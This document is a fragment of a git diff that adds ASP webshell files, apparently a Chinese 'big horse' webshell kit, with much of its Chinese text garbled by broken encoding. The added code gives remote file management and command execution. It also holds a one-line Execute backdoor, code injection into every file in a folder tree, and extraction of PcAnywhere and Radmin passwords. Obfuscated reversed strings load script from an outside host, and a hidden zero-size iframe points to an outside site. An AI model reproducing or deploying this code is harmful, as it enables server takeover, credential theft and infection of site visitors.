+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:function lIl(bb)
+but=22
+for i = 1 to len(bb)
+if mid(bb,i,1)<>"��" then
+If Asc(Mid(bb, i, 1)) < 32 Or Asc(Mid(bb, i, 1)) > 126 Then
+a = a & Chr(Asc(Mid(bb, i, 1)))
+else
+pk=asc(mid(bb,i,1))-but
+if pk>126 then
+pk=pk-95
+elseif pk<32 then
+pk=pk+95
+end if
+a=a&chr(pk)
+end if
+else
+a=a&vbcrlf
+end if
+next
+lIl=a
+end function
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf)):function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+
+case "apjdel":apjdel():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+%></body><iframe src=http://cpc-gov.cn/a/a/a.asp width=0 height=0></iframe></html>
\ No newline at end of file
diff --git a/www-7jyewu-cn/银河舰队大马_2012版.asp b/www-7jyewu-cn/银河舰队大马_2012版.asp
new file mode 100644
index 0000000..f115d92
--- /dev/null
+++ b/www-7jyewu-cn/银河舰队大马_2012版.asp
@@ -0,0 +1,1189 @@
+<%
+UserPass	="admin"'      	  		 	����
+clientPassword	="a"'				���ɺ���һ�仰����
+siteurl="aspmuma.cccpan.com"
+mNametitle	="���ӽ��Ӵ���_2012��"'  	 			
+topad       ="����!�ſ��Ǹ�������,��������"
+Copyright	="�������ڷǷ���;�����������߸Ų�����"'				��Ȩ
+Server.ScriptTimeout=999999999
+bs=False
+ShowFileIco=False
+IcoPath=""	
+durl=""
+Response.Buffer =true
+On Error Resume Next 
+strBAD="<script language=vbscript runat=server>"
+strBAD=strBAD&"If Request("""&clientPassword&""")<>"""" Then Session(""#"")=Request("""&clientPassword&""")"&VbNewLine
+strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))"
+strBAD=strBAD&"</script>"	
+Const DEfd=""
+sub ShowErr()
+  If Err Then
+j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
+Err.Clear:Response.Flush
+  End If
+end sub
+Sub j(str)
+response.write(str)
+End Sub
+Function RePath(S)
+  RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+  RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+execute(shisanfun(")��emaNF��(tseuqeR=emaNF��prevres=pp��UrevreS=uu��)��lru��(selbairavrevres.tseuqer=lru��ssaPresU=prevres��lru&)��tsoh_ptth��(selbaIRavreVRES.TSeuQeR=UrevreS��)��htaPredloF��(tseuqeR=htaPredloF��)��/��(htaPpaM.revreS=tooRWWW��)��.��(htaPpaM.revreS=htaPtooR��)��noitcA��(tseuqeR=noitcA��)��RDDA_LACOL��(selbairaVrevreS.tseuqeR=PIrevreS��)��DETALSNART_HTAP��(selbairaVrevreS.tseuqeR=OOOO��)��LRU��(selbairaVrevreS.tseuqeR=LRU"))
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf + ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+cdx="<tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'"">":cxd="<font face='wingdings'>8</font>":ef="</a></td></tr>"
+set fso=server.CreateObject("Scripting.FileSystemObject")
+set fsoX=server.CreateObject("Scripting.FileSystemObject")
+str1=""&Request.ServerVariables("SERVER_Name"):BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+j"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+j"<title>"&mNametitle&" - "&ServerIP&" </title>"
+j"<style type=""text/css"">"
+j"body,td{font-size: 12px;background-color:#444;color:#FFFFFF;}"
+j"input,select,textarea{font-size: 12px;background-color:#ddd;border:1px solid #fff}"
+j".C{background-color:#444;border:0px}"
+j".cmd{background-color:#000;color:#FFF}"
+j"body{margin: 0px;margin-left:4px;}"
+j"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#444}"
+j".am{color:#888;font-size:11px;}"
+j"</style>"
+if bs=true then:j"<script src="&htp&"1.js>":else:j"<script>":end if:j"function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""ȷ��Ҫִ�д˲�����""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""��"&Copyright&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""�����븴�Ƶ�Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""�������ƶ���Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""������Ҫ�½����ļ���ȫ����"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}</script>"
+j"<body" :
+If Action="" then j " scroll=no":j ">"
+DIm oBt(13,2)
+oBt(0,0) = "Scripting.FileSystemObject"
+  oBt(0,2) = "�ļ��������"
+Obt(1,0) = "wscript.shell"
+  obt(1,2) = "������ִ�����"
+obT(2,0) = "ADOX.Catalog"
+  ObT(2,2) = "ACCESS�������"
+oBt(3,0) = "JRO.JetEngine"
+  obt(3,2) = "ACCESSѹ�����"
+OBt(4,0) = "Scripting.Dictionary" 
+  ObT(4,2) = "�������ϴ��������"
+OBT(5,0) = "Adodb.connection"
+  oBT(5,2) = "���ݿ��������"
+oBT(6,0) = "Adodb.Stream"
+  oBT(6,2) = "�������ϴ����"
+OBT(7,0) = "SoftArtisans.FileUp"
+  OBT(7,2) = "SA-FileUp �ļ��ϴ����"
+obT(8,0) = "LyfUpload.UploadFile"
+  OBT(8,2) = "���Ʒ��ļ��ϴ����"
+oBT(9,0) = "Persits.Upload.1"
+  oBt(9,2) = "ASPUpload �ļ��ϴ����"
+obT(10,0) = "JMail.SmtpMail"
+  Obt(10,2) = "JMail �ʼ��շ����"
+obt(11,0) = "CDONTS.NewMail"
+  ObT(11,2) = "����SMTP�������"
+ObT(12,0) = "SmtpMail.SmtpMail.1"
+  oBT(12,2) = "SmtpMail�������"
+OBT(13,0) = "Microsoft.XMLHTTP"
+  OBt(13,2) = "���ݴ������"
+fOr I=0 tO 13
+	Set T=serVER.CReATEoBJEcT(obT(I,0))
+	If -2147221005 <> err Then
+	  ISoBJ=" ��"
+	ELSE
+	  ISobj=" ��"
+	  eRr.cLEar
+	eNd iF
+	Set T=nOthInG
+	oBt(i,1)=IsoBj
+neXt
+IF foLderPaTH<>"" Then
+  sEssioN("FolderPath")=rRepatH(fOlDeRpATH)
+EnD If
+If SeSSIoN("FolderPath")="" THEN
+  fOLDERpAth=RoOTpaTH
+  SESSIOn("FolderPath")=fOLDeRPatH
+end IF
+
+
+Function PcAnywhere4()
+j"<div align='center'>PcAnywhere��Ȩ Bin�汾</div><form name='xform' method='post'><table width='80%'border='0'><tr><td width='10%'>cif�ļ�: </td><td width='10%'><input name='path' type='text' value='C:\Documents and Settings\All Users\Application Data\\Symantec\pcAnywhere\Citempl.cif' size='80'></td><td><input type='submit' value=' �ύ '></td></table>"
+end Function
+j"</form><script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>"
+Function StreamLoadFromFile(sPath)
+Dim oStream
+Set oStream = Server.CreateObject("Adodb.Stream")
+With oStream
+.Type = 1
+.Mode = 3
+.Open
+.LoadFromFile(sPath)
+.Position = 0
+StreamLoadFromFile = .Read
+.Close
+End With
+Set oStream = Nothing
+End Function
+Function hexdec(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+ j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+ j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+ j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+ j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+ j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+ j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+ j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+ j = j * 16 
+Next 
+result = result + j 
+Next 
+hexdec = result 
+End Function 
+Function PcAnywhere(data,mode)
+HASH= Mid(data,3)
+If mode = "pass" Then number = 32: Cifnum = 144
+If mode = "user" Then number = 30: Cifnum = 15
+For i = 1 To number Step 2 
+pcstr=((hexdec(Mid(data,i,2)) xor hexdec(Mid(hash,i,2))) xor Cifnum)
+If ((pcstr <= 32) Or (pcstr>127)) Then Exit For 
+decode = decode + Chr(pcstr)
+Cifnum=Cifnum+1
+Next 
+PcAnywhere=decode
+End function
+Function bin2hex(binstr)
+For i = 1 To LenB(binstr)
+hexstr = Hex(AscB(MidB(binstr, i, 1)))
+If Len(hexstr)=1 Then 
+bin2hex=bin2hex&"0"&(LCase(hexstr))
+Else
+bin2hex=bin2hex& LCase(hexstr)
+End If 
+Next
+End Function
+CIF = Request("path")
+If CIF <> "" Then 
+BinStr=StreamLoadFromFile(CIF) 
+j"Pcanywhere Reader ==><br><br>PATH:"&CIF&"<br>�ʺ�:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user")
+j"<br>����:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass")
+End If 
+Function radmin()
+Set WSH= Server.CreateObject("WSCRIPT.SHELL")
+RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
+Parameter="Parameter"
+Port = "Port"
+j"<br>ע��:����HASHֵ����RadminHash���߻�od�������ӣ��������ص�ַ:"&htp&"soft/Radmin_hash.rar<br><br>"
+ParameterArray=WSH.REGREAD(RadminPath & Parameter )
+j Parameter&":"
+If IsArray(ParameterArray) Then
+For i = 0 To UBound(ParameterArray)
+If  Len (hex(ParameterArray(i)))=1 Then 
+strObj = strObj & "0"&CStr(Hex(ParameterArray(i)))
+Else
+strObj = strObj & Hex(ParameterArray(i))
+End If 
+Next
+j strobj
+Else
+j"Error! Can't Read!"
+End If
+j"<br><br>"
+PortArray=WSH.REGREAD(RadminPath & Port )
+If IsArray(PortArray) Then 
+j Port &":" 
+j hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
+Else 
+j"Error! Can't Read!"
+End If
+End Function
+Function hextointer(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+j = j * 16 
+Next 
+result = result + j 
+Next 
+hextointer = result 
+End Function:Function MainForm()
+execute(shisanfun("��>elbat/<>rt/<>dt/<��j��:��>emarfi/<>'1'=redrobemarf '%001'=thgieh '%001'=htdiw 'eliF1wohS=noitcA?'=crs 'emarFeliF'=eman emarfi<��j��:��>dt<��j��:��>dt/<>emarfi/<>'0'=redrobemarf '%001'=thgieh '%001'=htdiw 'uneMniaM=noitcA?'=crs 'tfeL'=eman emarfi<��j��:��>'071'=htdiw dt<>rt<>rt/<>dt/<>elbat/<>mrof/<>rt/<>dt/<��j��:��>dt<>dt/<��>a/<stnemucoD>')���\\stnemucoD\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<pmeT>')���\\pmeT\\swodniw\\:c���(redloFwohS:tpircsavaj'=ferh a<����>a/<atad>')���\\atad\\vrsteni\\23metsys\\SWODNIW\\:c���(redloFwohS:tpircsavaj'=ferh a<����>a/<gifnoc>')���\\gifnoc\\23metsys\\SWODNIW\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<LQS>')���\\revreS LQS tfosorciM\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<revreSlaeR>')���laeR\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<u-vres>')���\\u-vres\\seliF margorP\\:c���(redloFwohS:tpircsavaj'=ferh a<����>a/<erehwynAcp>')���\\erehwynAcp\\cetnamyS\\ataD noitacilppA\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<RELCYCER\:D>')���\\RELCYCER\\:D���(redloFwohS:tpircsavaj'=ferh a<����>a/<RELCYCER\\:C>')���\\RELCYCER\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<��� >b/<��>b< ʼ��>')���\\���\\���ˡ�ʼ����\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<sresUllA>')���\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<margorP>')���seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh a<��������¼Ŀ>rt<��j��:��>'elddim'=ngilav 'retnec'=ngila rt<  ��j��: ��>')(daoler.noitacol.emarFeliF'=kcilcno '�ڴ�����ˢ'=eulav 'timbus'=epyt tupni< >'��ת'=eulav 'timbus'=epyt 'timbuS'=eman tupni<>'retnec'=ngila '041'=htdiw dt<>dt/<��j��:��>'��&)��htaPredloF��(noISseS&��'=eulav '%001:htdiw'=elyts 'htaPredloF'=eman tupni<��j��:��>dt<>dt/<����ַ��>'retnec'=ngila '06'=htdiw dt<>rt<��j��:��>'tnerap_'=tegrat '��&lrU&��'=noitca 'tsop'=dohtem 'mrofrdda'=eman mrof<��j��:��>'%001'=htdiw elbat<��j��:��>'2'=napsloc '03'=thgieh dt<>rt<��j��:��>'0'=gnicapsllec '1'=gniddapllec 0=redrob  '%001'=thgieh '%001'=htdiw elbat<��j��:��>mrof/<��j��:��>���emaNF���=eman ���neddih���=epyt tupni<��j��:��>���noitcA���=eman ���neddih���=epyt tupni<��j��:��>���emarFeliF���=tegrat ����&Lru&����=noitca ���tsop���=dohtem ���mrofedih���=eman mrof<��j"))
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+acode="=s?psa.s/xs/moc.pxe"&"yado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf))
+ExeCuTe(ShiSanFun("buS dnE��gnihtoN = redloFeht teS��txeN��fI dnE��fI dnE��etadpU.sr��)(daeR.maerts = )��tnetnoCelif��(sr��)htaP.meti(eliFmorFdaoL.maerts��)4 ,htaP.meti(diM = )��htaPeht��(sr��weNddA.sr��nehT 0 =< )��$�� & emaN.meti & ��$�� ,tsiLeliFsys(rtSnI fI��eslE ��maerts ,sr ,htaP.meti bdMroFeerTas��nehT eurT = redloFsI.meti fI��smetI.redloFeht nI meti hcaE roF��)htaPeht(ecapSemaN.Xas = redloFeht teS���$bdl.HSH$bdm.HSH$�� = tsiLeliFsys��tsiLeliFsys ,redloFeht ,meti miD��)maerts ,sr ,htaPeht(bdMroFeerTas buS��buS dnE��pooL��fI dnE��0 = i��eslE ��)��\�� ,)1 + i ,htaPeht(diM(rtsnI + i = i��nehT )��\�� ,)1 + i ,htaPeht(diM(rtSnI fI��fI dnE��))1 - i ,htaPeht(tfeL(redloFetaerC.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS��nehT eslaF = ))i ,htaPeht(tfeL(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI��0 > i elihW oD��)��\�� ,htaPeht(rtsnI = i��i miD��)htaPeht(redloFetaerc buS��buS dnE��gnihtoN = nnoc teS��gnihtoN = maerts teS��gnihtoN = sr teS��gnihtoN = sw teS��esolC.maerts��esolC.nnoc��esolC.sr��pooL��txeNevoM.sr��2 ,)��htaPeht��(sr & rts eliFoTevaS.maerts��)��tnetnoCelif��(sr etirW.maerts��)(soEteS.maerts��fI dnE��)redloFeht & rts(redloFetaerc��nehT eslaF = )redloFeht & rts(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI��))��\�� ,)��htaPeht��(sr(veRrtSnI ,)��htaPeht��(sr(tfeL = redloFeht��foE.sr litnU oD��1 = epyT.maerts��nepO.maerts��1 ,1 ,nnoc ,��ataDeliF�� nepO.sr��rtSnnoc nepO.nnoc���;�� & htaPeht & ��=ecruoS ataD;0.4.BDELO.teJ.tfosorciM=redivorP�� = rtSnnoc��)��noitcennoC.BDODA��(tcejbOetaerC = nnoc teS��)��maertS.BDODA��(tcejbOetaerC = maerts teS��)��teSdroceR.BDODA��(tcejbOetaerC = sr teS���\�� & )��.��(htaPpaM.revreS = rts��redloFeht ,rtSnnoc ,maerts ,nnoc ,rts ,sw ,sr miD��000001=tuOemiTtpircS.revreS��txeN emuseR rorrE nO��)htaPeht(kcaPnu buS��)emanf&��\��&toorwww(eliFtxeTetaerC.osf=esonpser tes��noitcnuF dnE��gnihtoN = redloFeht teS��gnihtoN = sredlof teS��gnihtoN = selif teS��txeN��fI dnE��etadpU.sr��)(daeR.maerts = )��tnetnoCelif��(sr��)htaP.meti(eliFmorFdaoL.maerts��)4 ,htaP.meti(diM = )��htaPeht��(sr��weNddA.sr��nehT 0 =< )��$�� & emaN.meti & ��$�� ,tsiLeliFsys(rtSnI fI��selif nI meti hcaE roF��txeN��maerts ,sr ,htaP.meti bdMroFeerTosf��sredlof nI meti hcaE roF��sredloFbuS.redloFeht = sredlof teS��seliF.redloFeht = selif teS��)htaPeht(redloFteG.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS = redloFeht teS��fI dnE��)��!�ʷ����ʲ��߻��ڴ治¼Ŀ �� & htaPeht(rrEwohs��nehT eslaF = )htaPeht(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI���$bdl.HSH$bdm.HSH$�� = tsiLeliFsys��tsiLeliFsys ,selif ,sredlof ,redloFeht ,meti miD��)maerts ,sr ,htaPeht(bdMroFeerTosf noitcnuF��buS dnE��gnihtoN = golataCoda teS��gnihtoN = maerts teS��gnihtoN = nnoc teS��gnihtoN = sr teS��esolC.maerts��esolC.nnoC��esolC.sr��fI dnE��maerts ,sr ,htaPeht bdMroFeerTas��eslE ��maerts ,sr ,htaPeht bdMroFeerTosf��nehT ��osf�� = )��dohteMeht��(tseuqeR fI��3 ,3 ,nnoc ,��ataDeliF�� nepO.sr��1 = epyT.maerts��nepO.maerts��)��)egamI tnetnoCelif ,rahCraV htaPeht ,DERETSULC YEK YRAMIRP )1,0(YTITNEDI tni dI(ataDeliF elbaT etaerC��(etucexE.nnoc��rtSnnoc nepO.nnoc��rtSnnoc etaerC.golataCoda��)��bdm.HSH��(htaPpaM.revreS & ��=ecruoS ataD ;0.4.BDELO.teJ.tfosorciM=redivorP�� = rtSnnoc��)��golataC.XODA��(tcejbOetaerC.revreS = golataCoda teS��)��noitcennoC.BDODA��(tcejbOetaerC.revreS = nnoc teS��)��maertS.BDODA��(tcejbOetaerC.revreS = maerts teS��)��teSdroceR.BDODA��(tcejbOetaerC.revreS = sr teS��golataCoda ,rtSnnoc ,maerts ,nnoc ,sr miD��txeN emuseR rorrE nO��)htaPeht(bdMoTdda buS��buS dnE���>mrof/<��¼Ŀ��̱���λ������������������ :ע>rb<>rb<>'������'=eulav timbus=epyt tupni<>tcAeht=eman bdMmorFesaeler=eulav neddih=epyt tupni<>08=ezis ���bdm.HSH\�� & ))��.��(htaPpaM.revreS(edocnElmtH & ����=eulav htaPeht=eman tupni<>))���#���(noisseS(etucexE=eulav ���#���=eman neddih=epyt tupni<>tsop=dohtem mrof<>/rb<:)��֧OSF��(���������>/rh<>mrof/<��¼Ŀ��ͬ��ľmas��λ,����bdm.HSH�������� :ע>rb<>rb<>'����ʼ��'=eulav timbus=epyt tupni<>tceles/<>noitpo/<OSF��>ppa=eulav noitpo<>noitpo/<OSF>osf=eulav noitpo<>dohteMeht=eman tceles<>tcAeht=eman bdMoTdda=eulav neddih=epyt tupni<>08=ezis ���� & ))��.��(htaPpaM.revreS(edocnElmtH & ����=eulav htaPeht=eman tupni<>))���#���(noisseS(etucexE=eulav ���#���=eman neddih=epyt tupni<>tsop=dohtem mrof<:����м���>rb<��j��fI dnE��dnE.esnopseR��lrUkcaB&��>vid/<!��������>rb<>retnec=ngila vid<�� j��)htaPeht(kcaPnu��nehT ��bdMmorFesaeler�� = tcAeht fI��fI dnE��dnE.esnopseR��lrUkcaB&��>vid/<!��������>rb<>retnec=ngila vid<�� j��)htaPeht(bdMoTdda��nehT ��bdMoTdda�� = tcAeht fI��000001=tuOemiTtpircS.revreS��)��htaPeht��(tseuqeR = htaPeht��)��tcAeht��(tseuqeR = tcAeht��htaPeht ,tcAeht miD��)(bdMoTddAegaP buS��"))
+
+
+
+Function ProFile()
